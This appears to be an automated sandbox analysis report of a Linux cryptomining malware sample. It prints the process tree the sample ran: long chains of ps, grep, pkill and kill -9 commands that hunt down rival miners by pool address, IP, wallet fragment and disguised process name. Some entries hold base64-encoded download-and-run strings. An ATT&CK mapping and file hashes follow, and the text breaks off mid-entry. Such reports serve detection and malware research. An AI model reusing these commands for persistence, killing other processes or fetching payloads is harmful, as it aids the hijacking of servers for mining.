grep 83.220.169.247
2⤵
PID:1546

/bin/grep
grep -v grep
2⤵
PID:1545

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1544

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1553

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1552

/bin/grep
grep 51.38.203.146
2⤵
PID:1551

/bin/grep
grep -v grep
2⤵
PID:1550

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1549

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1558

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1557

/bin/grep
grep 144.217.45.45
2⤵
PID:1556

/bin/grep
grep -v grep
2⤵
PID:1555

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1554

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1563

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1562

/bin/grep
grep 107.174.47.181
2⤵
PID:1561

/bin/grep
grep -v grep
2⤵
PID:1560

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:1559

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1568

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1567

/bin/grep
grep 176.31.6.16
2⤵
PID:1566

/bin/grep
grep -v grep
2⤵
PID:1565

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1564

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1573

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1572

/bin/grep
grep mine.moneropool.com
2⤵
PID:1571

/bin/grep
grep -v grep
2⤵
PID:1570

/bin/ps
ps auxf
2⤵
PID:1569

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1578

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1577

/bin/grep
grep pool.t00ls.ru
2⤵
PID:1576

/bin/grep
grep -v grep
2⤵
PID:1575

/bin/ps
ps auxf
2⤵
PID:1574

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1583

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1582

/bin/grep
grep xmr.crypto-pool.fr:8080
2⤵
PID:1581

/bin/grep
grep -v grep
2⤵
PID:1580

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1579

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1588

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1587

/bin/grep
grep xmr.crypto-pool.fr:3333
2⤵
PID:1586

/bin/grep
grep -v grep
2⤵
PID:1585

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:1584

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1593

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1592

/bin/grep
grep "[email protected]"
2⤵
PID:1591

/bin/grep
grep -v grep
2⤵
PID:1590

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1589

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1598

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1597

/bin/grep
grep monerohash.com
2⤵
PID:1596

/bin/grep
grep -v grep
2⤵
PID:1595

/bin/ps
ps auxf
2⤵
PID:1594

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1603

/bin/grep
grep /tmp/a7b104c270
2⤵
PID:1601

/bin/ps
ps auxf
2⤵
PID:1599

/bin/grep
grep -v grep
2⤵
PID:1600

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1602

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1608

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1607

/bin/grep
grep xmr.crypto-pool.fr:6666
2⤵
PID:1606

/bin/grep
grep -v grep
2⤵
PID:1605

/bin/ps
ps auxf
2⤵
PID:1604

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1613

/usr/bin/awk
awk "{print \$2}"
2⤵
- Reads runtime system information
PID:1612

/bin/grep
grep xmr.crypto-pool.fr:7777
2⤵
PID:1611

/bin/grep
grep -v grep
2⤵
PID:1610

/bin/ps
ps auxf
2⤵
PID:1609

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1618

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1617

/bin/grep
grep xmr.crypto-pool.fr:443
2⤵
PID:1616

/bin/grep
grep -v grep
2⤵
PID:1615

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:1614

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1623

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1622

/bin/grep
grep stratum.f2pool.com:8888
2⤵
PID:1621

/bin/grep
grep -v grep
2⤵
PID:1620

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:1619

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1628

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1627

/bin/grep
grep xmrpool.eu
2⤵
PID:1626

/bin/grep
grep -v grep
2⤵
PID:1625

/bin/ps
ps auxf
2⤵
PID:1624

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1632

/usr/local/sbin/kill
kill -9 1630
3⤵
PID:1633

/usr/local/bin/kill
kill -9 1630
3⤵
PID:1633

/usr/sbin/kill
kill -9 1630
3⤵
PID:1633

/usr/bin/kill
kill -9 1630
3⤵
PID:1633

/sbin/kill
kill -9 1630
3⤵
PID:1633

/bin/kill
kill -9 1630
3⤵
PID:1633

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1631

/bin/grep
grep xiaoyao
2⤵
PID:1630

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:1629

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1637

/usr/local/sbin/kill
kill -9 1635
3⤵
PID:1638

/usr/local/bin/kill
kill -9 1635
3⤵
PID:1638

/usr/sbin/kill
kill -9 1635
3⤵
PID:1638

/usr/bin/kill
kill -9 1635
3⤵
PID:1638

/sbin/kill
kill -9 1635
3⤵
PID:1638

/bin/kill
kill -9 1635
3⤵
- Reads CPU attributes
PID:1638

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1636

/bin/ps
ps auxf
2⤵
PID:1634

/bin/grep
grep xiaoxue
2⤵
PID:1635

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1641

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1642

/bin/grep
grep 46.243.253.15
2⤵
PID:1640

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1643

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1644

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1650

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1649

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1648

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1647

/bin/grep
grep 176.31.6.16
2⤵
PID:1646

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1656

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1655

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1654

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1653

/bin/grep
grep 108.174.197.76
2⤵
PID:1652

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1661

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1660

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1662

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1659

/bin/grep
grep 192.236.161.6
2⤵
PID:1658

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1668

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:1667

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1666

/bin/grep
grep "ESTABLISHED\\|SYN_SENT"
2⤵
PID:1665

/bin/grep
grep 88.99.242.92
2⤵
PID:1664

/usr/bin/pkill
pkill -f pastebin
2⤵
PID:1669

/usr/bin/pkill
pkill -f 185.193.127.115
2⤵
- Reads runtime system information
PID:1670

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1672

/usr/bin/pgrep
pgrep -f monerohash
2⤵
PID:1671

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1674

/usr/bin/pgrep
pgrep -f L2Jpbi9iYXN
2⤵
- Reads CPU attributes
PID:1673

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1676

/usr/bin/pgrep
pgrep -f xzpauectgr
2⤵
- Reads runtime system information
PID:1675

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1678

/usr/bin/pgrep
pgrep -f slxfbkmxtd
2⤵
- Reads runtime system information
PID:1677

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1680

/usr/bin/pgrep
pgrep -f mixtape
2⤵
- Reads runtime system information
PID:1679

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1682

/usr/bin/pgrep
pgrep -f addnj
2⤵
PID:1681

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1684

/usr/bin/pgrep
pgrep -f 200.68.17.196
2⤵
PID:1683

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1686

/usr/bin/pgrep
pgrep -f IyEvYmluL3NoCgpzUG
2⤵
PID:1685

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1688

/usr/bin/pgrep
pgrep -f KHdnZXQgLXFPLSBodHRw
2⤵
PID:1687

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1690

/usr/bin/pgrep
pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
2⤵
PID:1689

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1692

/usr/bin/pgrep
pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
2⤵
PID:1691

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1694

/usr/bin/pgrep
pgrep -f mwyumwdbpq.conf
2⤵
PID:1693

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1696

/usr/bin/pgrep
pgrep -f honvbsasbf.conf
2⤵
- Reads CPU attributes
PID:1695

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1698

/usr/bin/pgrep
pgrep -f mqdsflm.cf
2⤵
- Reads CPU attributes
PID:1697

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1700

/usr/bin/pgrep
pgrep -f stratum
2⤵
PID:1699

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1702

/usr/bin/pgrep
pgrep -f lower.sh
2⤵
- Reads runtime system information
PID:1701

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1704

/usr/bin/pgrep
pgrep -f ./ppp
2⤵
- Reads runtime system information
PID:1703

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1706

/usr/bin/pgrep
pgrep -f cryptonight
2⤵
PID:1705

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1708

/usr/bin/pgrep
pgrep -f ./seervceaess
2⤵
PID:1707

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1710

/usr/bin/pgrep
pgrep -f ./servceaess
2⤵
PID:1709

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1712

/usr/bin/pgrep
pgrep -f ./servceas
2⤵
PID:1711

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1714

/usr/bin/pgrep
pgrep -f ./servcesa
2⤵
- Reads CPU attributes
PID:1713

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1716

/usr/bin/pgrep
pgrep -f ./vsp
2⤵
PID:1715

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1718

/usr/bin/pgrep
pgrep -f ./jvs
2⤵
- Reads runtime system information
PID:1717

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1720

/usr/bin/pgrep
pgrep -f ./pvv
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1719

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1722

/usr/bin/pgrep
pgrep -f ./vpp
2⤵
- Reads CPU attributes
PID:1721

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1724

/usr/bin/pgrep
pgrep -f ./pces
2⤵
- Reads CPU attributes
PID:1723

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1726

/usr/bin/pgrep
pgrep -f ./rspce
2⤵
- Reads CPU attributes
PID:1725

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1728

/usr/bin/pgrep
pgrep -f ./haveged
2⤵
PID:1727

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1730

/usr/bin/pgrep
pgrep -f ./jiba
2⤵
PID:1729

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1732

/usr/bin/pgrep
pgrep -f ./watchbog
2⤵
- Reads CPU attributes
PID:1731

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1734

/usr/bin/pgrep
pgrep -f ./A7mA5gb
2⤵
PID:1733

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1736

/usr/bin/pgrep
pgrep -f kacpi_svc
2⤵
PID:1735

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1738

/usr/bin/pgrep
pgrep -f kswap_svc
2⤵
- Reads CPU attributes
PID:1737

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1740

/usr/bin/pgrep
pgrep -f kauditd_svc
2⤵
- Reads CPU attributes
PID:1739

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1742

/usr/bin/pgrep
pgrep -f kpsmoused_svc
2⤵
PID:1741

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1744

/usr/bin/pgrep
pgrep -f kseriod_svc
2⤵
PID:1743

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1746

/usr/bin/pgrep
pgrep -f kthreadd_svc
2⤵
PID:1745

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1748

/usr/bin/pgrep
pgrep -f ksoftirqd_svc
2⤵
- Reads runtime system information
PID:1747

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1750

/usr/bin/pgrep
pgrep -f kintegrityd_svc
2⤵
PID:1749

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1752

/usr/bin/pgrep
pgrep -f jawa
2⤵
- Reads runtime system information
PID:1751

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1754

/usr/bin/pgrep
pgrep -f oracle.jpg
2⤵
PID:1753

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1756

/usr/bin/pgrep
pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN
2⤵
- Reads runtime system information
PID:1755

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1758

/usr/bin/pgrep
pgrep -f 188.209.49.54
2⤵
PID:1757

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1760

/usr/bin/pgrep
pgrep -f 181.214.87.241
2⤵
- Reads CPU attributes
PID:1759

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1762

/usr/bin/pgrep
pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ
2⤵
PID:1761

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1764

/usr/bin/pgrep
pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj
2⤵
PID:1763

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1766

/usr/bin/pgrep
pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK
2⤵
PID:1765

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1768

/usr/bin/pgrep
pgrep -f servim
2⤵
PID:1767

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1770

/usr/bin/pgrep
pgrep -f kblockd_svc
2⤵
PID:1769

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1772

/usr/bin/pgrep
pgrep -f native_svc
2⤵
- Reads CPU attributes
PID:1771

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1774

/usr/bin/pgrep
pgrep -f ynn
2⤵
PID:1773

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1776

/usr/bin/pgrep
pgrep -f 65ccEJ7
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1775

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1778

/usr/bin/pgrep
pgrep -f jmxx
2⤵
- Reads CPU attributes
PID:1777

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1780

/usr/bin/pgrep
pgrep -f 2Ne80nA
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1779

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1782

/usr/bin/pgrep
pgrep -f sysstats
2⤵
PID:1781

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1784

/usr/bin/pgrep
pgrep -f systemxlv
2⤵
- Reads CPU attributes
PID:1783

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1786

/usr/bin/pgrep
pgrep -f watchbog
2⤵
PID:1785

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1788

/usr/bin/pgrep
pgrep -f OIcJi1m
2⤵
- Reads CPU attributes
PID:1787

/usr/bin/pkill
pkill -f biosetjenkins
2⤵
PID:1789

/usr/bin/pkill
pkill -f Loopback
2⤵
PID:1790

/usr/bin/pkill
pkill -f apaceha
2⤵
PID:1791

/usr/bin/pkill
pkill -f cryptonight
2⤵
- Reads CPU attributes
PID:1792

/usr/bin/pkill
pkill -f stratum
2⤵
- Reads runtime system information
PID:1793

/usr/bin/pkill
pkill -f mixnerdx
2⤵
PID:1794

/usr/bin/pkill
pkill -f performedl
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1795

/usr/bin/pkill
pkill -f JnKihGjn
2⤵
PID:1796

/usr/bin/pkill
pkill -f irqba2anc1
2⤵
- Reads CPU attributes
PID:1797

/usr/bin/pkill
pkill -f irqba5xnc1
2⤵
PID:1798

/usr/bin/pkill
pkill -f irqbnc1
2⤵
PID:1799

/usr/bin/pkill
pkill -f ir29xc1
2⤵
PID:1800

/usr/bin/pkill
pkill -f conns
2⤵
PID:1801

/usr/bin/pkill
pkill -f irqbalance
2⤵
PID:1802

/usr/bin/pkill
pkill -f crypto-pool
2⤵
- Reads runtime system information
PID:1803

/usr/bin/pkill
pkill -f XJnRj
2⤵
PID:1804

/usr/bin/pkill
pkill -f mgwsl
2⤵
PID:1805

/usr/bin/pkill
pkill -f pythno
2⤵
PID:1806

/usr/bin/pkill
pkill -f jweri
2⤵
PID:1807

/usr/bin/pkill
pkill -f lx26
2⤵
PID:1808

/usr/bin/pkill
pkill -f NXLAi
2⤵
PID:1809

/usr/bin/pkill
pkill -f BI5zj
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1810

/usr/bin/pkill
pkill -f askdljlqw
2⤵
- Reads runtime system information
PID:1811

/usr/bin/pkill
pkill -f minerd
2⤵
PID:1812

/usr/bin/pkill
pkill -f minergate
2⤵
PID:1813

/usr/bin/pkill
pkill -f Guard.sh
2⤵
- Reads CPU attributes
PID:1814

/usr/bin/pkill
pkill -f ysaydh
2⤵
PID:1815

/usr/bin/pkill
pkill -f bonns
2⤵
PID:1816

/usr/bin/pkill
pkill -f donns
2⤵
- Reads CPU attributes
PID:1817

/usr/bin/pkill
pkill -f kxjd
2⤵
- Reads CPU attributes
PID:1818

/usr/bin/pkill
pkill -f Duck.sh
2⤵
- Reads runtime system information
PID:1819

/usr/bin/pkill
pkill -f bonn.sh
2⤵
- Reads CPU attributes
PID:1820

/usr/bin/pkill
pkill -f conn.sh
2⤵
PID:1821

/usr/bin/pkill
pkill -f kworker34
2⤵
PID:1822

/usr/bin/pkill
pkill -f kw.sh
2⤵
PID:1823

/usr/bin/pkill
pkill -f pro.sh
2⤵
PID:1824

/usr/bin/pkill
pkill -f polkitd
2⤵
PID:1825

/usr/bin/pkill
pkill -f acpid
2⤵
- Reads runtime system information
PID:1826

/usr/bin/pkill
pkill -f icb5o
2⤵
PID:1827

/usr/bin/pkill
pkill -f nopxi
2⤵
PID:1828

/usr/bin/pkill
pkill -f irqbalanc1
2⤵
PID:1829

/usr/bin/pkill
pkill -f minerd
2⤵
- Reads CPU attributes
PID:1830

/usr/bin/pkill
pkill -f i586
2⤵
PID:1831

/usr/bin/pkill
pkill -f gddr
2⤵
PID:1832

/usr/bin/pkill
pkill -f mstxmr
2⤵
PID:1833

/usr/bin/pkill
pkill -f ddg.2011
2⤵
PID:1834

/usr/bin/pkill
pkill -f wnTKYg
2⤵
- Reads CPU attributes
PID:1835

/usr/bin/pkill
pkill -f deamon
2⤵
PID:1836

/usr/bin/pkill
pkill -f disk_genius
2⤵
PID:1837

/usr/bin/pkill
pkill -f sourplum
2⤵
PID:1838

/usr/bin/pkill
pkill -f polkitd
2⤵
PID:1839

/usr/bin/pkill
pkill -f nanoWatch
2⤵
PID:1840

/usr/bin/pkill
pkill -f zigw
2⤵
- Reads CPU attributes
PID:1841

/usr/bin/pkill
pkill -f devtool
2⤵
PID:1842

/usr/bin/pkill
pkill -f devtools
2⤵
PID:1843

/usr/bin/pkill
pkill -f systemctI
2⤵
- Reads CPU attributes
PID:1844

/usr/bin/pkill
pkill -f watchbog
2⤵
PID:1845

/usr/bin/pkill
pkill -f cryptonight
2⤵
PID:1846

/usr/bin/pkill
pkill -f sustes
2⤵
PID:1847

/usr/bin/pkill
pkill -f xmrig
2⤵
- Reads runtime system information
PID:1848

/usr/bin/pkill
pkill -f xmrig-cpu
2⤵
PID:1849

/usr/bin/pkill
pkill -f 121.42.151.137
2⤵
PID:1850

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit
/var/mail/user

Filesize
825B

MD5
c1c72e24696f1967ec6fefa8ef40de1c

SHA1
47db5c4385bee00987a9403b2e336597fdbb64ca

SHA256
38abf346d753dcb9b1609bfb58050ae4b7228ac5ab1314a86e742deead084ba1

SHA512
2a2eba2a7173951414f529f08885e5be3e61d5f6fda020880ebf14ce8fa9dbfc877cbe15d1756fb14fc52d6bcf9ff60b999cc3ed8f05a3529d82385f43db3d79

Download Submit
/var/mail/user

Filesize
1KB

MD5
8a87979fe9979f930895480b223acf45

SHA1
862beea68f7dc63ef50ceb1729f619ecd4a2871b

SHA256
4d2610b4588685590ece97426a4a928e0856bc1e8cea563bfa29b0e49ba9643d

SHA512
f566a05a767b85990055ae171c6d3664ff935f4b4fd24ec505e03290cde13ace60bfd0258debf993eb09ca47c29d00cd0c0fbe7a0d3bce1b19bd1a3015759669

Download Submit
/var/spool/cron/crontabs/tmp.HCl7Fr

Filesize
175B

MD5
7be4ec7ad7805d18a824186ce3d1863d

SHA1
cbd4235e4eaafbba0087a91ad3b560c8a47d7f6b

SHA256
fd79847a1e1cc7e1f2cb4866b5a9edcdab6ec32ef05a2eea71e8723f85584f48

SHA512
0347b26a2d2c5bed86668057ed6639bc9c24e26f469f5aad4cc65caa2b45034d0615483220ee1a9acbba6bbb3f9bceb1346f5640e0d14e30b2eb3e4354752b8f

Download Submit
/var/spool/cron/crontabs/tmp.HGzAwW

Filesize
318B

MD5
b89a2382fdb05712b77a6027c9d8b80a

SHA1
16c171d65d893390c5d220cc38327f9a0070f45a

SHA256
4b5ae72e629f2e0a4051d16f1e0c6c2a29594c9d98cac8cc31d264a0d61fd853

SHA512
9ca2104e537e43033a5820b771a6ef8b945e581097f8ade33872b6a750658487140194256a43b07efdfd63dbb8c28859c7760bcf21f28a2852efcba4bc9e9da1

Download Submit
/var/spool/cron/crontabs/tmp.aOekth

Filesize
175B

MD5
7b7c3120d007a435aa33293be869d413

SHA1
2ddeb633494b191293237cfe6cd9d8e98708b7cd

SHA256
daba24f21000a2d043e2da80d6316640590ba5b26b2dd7d0885e81318ecf063a

SHA512
0a71821e43dccaa9c65cff72b61b53953cdb421b273e5f4d204ae1f17d105311fe77eb9950e49dd569f6ba3a9c4abd862a7f323b94a97da82670e1f58696fbad

Download Submit
/var/spool/cron/crontabs/tmp.ctChMc

Filesize
175B

MD5
cacb33258735ecfca5d30c8c91cd08d1

SHA1
a56942eb286b71d5ddf1374bfb91221f54505acf

SHA256
40c76878b92a07d44a4cfedae583e579a7fc3e2ea34285d84e4eee8365dadda2

SHA512
092d8b58cfe338eb7839d01d2c5e1de645b9d2d95b7d459eda5a6a5c1a491f298323f534a92a481da73f9f1635074bc082dbb4c6334a5eaa2232156a48f0a784

Download Submit
/var/spool/cron/crontabs/tmp.tlIXqf

Filesize
175B

MD5
791bcc0af7f62868bd6457e678894f0a

SHA1
356185cd761b9943854428f29aa650e764bd557a

SHA256
8b34681a3280382654cf79c53dcfcb6e7ef382f9e553cef0d8bf08ee436d9431

SHA512
e19f79bfbb3377e9f3bef984c139d7699662389aee24df1159f997aa744ce4aeb59c4ba87438aebeecb33edf226d1ae7ed2d7a222a50693c7e9fcd42d1a5caae

Download Submit
/var/spool/exim4/input/1suqJW-0000Bu-3X-D

Filesize
128B

MD5
705cd3d9bd5b3c19eba4f5b481fb50b3

SHA1
518fe4f8cca025fb723f641702bb9c37520c4b04

SHA256
97086bcce5a8d8ba6d6b2c0415734d95e346f3dc61789f16608aebb00516c395

SHA512
7a1a3a29d2ec92e61c3dcf970ce2bfade2c8b78640afc106d45008854a649da863f43ce43590d84eb8336da1952df57fa29482e7d2e0b07633705df9ce8c66ad

Download Submit
/var/spool/exim4/input/1suqJW-0000Bu-3X-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/1suqJW-0000By-2o-D

Filesize
146B

MD5
1c074672cf728af1a20abbca4bed0186

SHA1
7a667830550c85e9f4c8ba8c9c3ec15be58f0128

SHA256
55bbd7b4c5a2bb267b034061cd998e322db5775c309a42a2e0ce900b64176422

SHA512
e9e84c57c336e46ac16881eeaf230abc00db86f89d0526cc9ed2b77d25c1729a9cbc48575900833f5381ebdc0cf4a3f50b8d003ec816785b64c40d4ef42c51a3

Download Submit
/var/spool/exim4/input/hdr.742

Filesize
915B

MD5
4fb4b33b7288f00697d990b9a2c7bbd9

SHA1
dde4862665231500325500632444fcf7912a7f1d

SHA256
69d44a5b8945f687b5d3e78af0e8fc07cf13cc4dc9bd40198bcafa145877a287

SHA512
71bc5df09cd9c5c994d9c2889d1150973d7641731d4704a9e41211a1da720aaf30c351e2cd7110fb1c897b78e129bde1d25fa317fda03461467ab690be674973

Download Submit
/var/spool/exim4/msglog/1suqJW-0000Bu-3X

Filesize
288B

MD5
53c15a3d1caa82c3de26a5fe81a44ac3

SHA1
69bc661e9a61ee4191b58ee0b674a8184b93551d

SHA256
